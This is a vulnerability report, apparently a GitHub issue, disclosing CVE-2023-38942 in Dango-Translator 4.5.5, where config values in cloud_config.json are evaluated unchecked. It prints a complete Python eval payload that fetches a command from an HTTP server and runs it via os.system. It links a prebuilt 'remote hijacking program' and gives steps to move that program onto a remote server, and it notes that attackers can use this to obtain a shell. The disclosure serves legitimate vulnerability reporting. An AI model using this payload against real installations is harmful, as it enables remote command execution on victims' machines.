Headline
CVE-2023-38942: [Warning] Hijacked Remote Command Execute in Dango-Translator Ver4.5.5 · Issue #127 · PantsuDango/Dango-Translator
Dango-Translator v4.5.5 was discovered to contain a remote command execution (RCE) vulnerability via the component app/config/cloud_config.json.
Vulnerability Product: Dango-Translator Ver4.5.5
Vulnerability version: Ver4.5.5
Vulnerability type: Hijacked Remote Command Execute
Vulnerability Details:
Vulnerability location: app/config/cloud_config.json
withoud check the xxxUse variable in app/config/cloud_config.json and eval it ,unsafe config may causes Hijacked Remote Command Execute
client payload : "import(‘urllib.request’).request.urlopen(‘http://localhost:12345/DangoTranslate/ShowDict’).read().decode(‘utf-8’) + (‘’ if import(‘os’).system(import(‘urllib.request’).request.urlopen(‘http://localhost:12345/CmdPath’).read().decode(‘utf-8’)) else ‘’)"
remote hijacking program : https://github.com/Leeyangee/leeya_bug/raw/main/DangoTranslator_payload/testProject/testProject.exe
remote hijacking program original code : https://github.com/Leeyangee/leeya_bug/tree/main/DangoTranslator_payload/testProject
PROVE:
Firstly download a Dango-Translator Ver4.5.5
Run the program to generate config
Secondly go to app/config/cloud_config.json, replace value of xxxUse with client payload,
here replace "tencentwebUse": “False” with "tencentwebUse": "import(‘urllib.request’).request.urlopen(‘http://localhost:12345/DangoTranslate/ShowDict’).read().decode(‘utf-8’) + (‘’ if import(‘os’).system(import(‘urllib.request’).request.urlopen(‘http://localhost:12345/CmdPath’).read().decode(‘utf-8’)) else ‘’)"
Thirdly download remote hijacking program : https://github.com/Leeyangee/leeya_bug/raw/main/DangoTranslator_payload/testProject/testProject.exe, and keep the program running
(This is a remote hijacking program, so you can deploy it on server but need to change IP_DOMAIN in original_code and url in client payload and re-compile it)
Fourthly run "团子翻译器.exe", after login in, windows pops up a calculator(because remote hijacking program runs “calc” command on the client)
Once the client login in, the remote hijacking program could detect it and run command on the client
proved Hijacked Remote Command Execute
REASON:
the client payload is divided into these parts
the result of eval(client payload) is it self, because “tencentwebUse” will be evaled before exit
Harm:
attackers could replace payload in order to let client respond a shell to attackers
so attackers could directly obtain shell and get server permissions
discovered by leeya_bug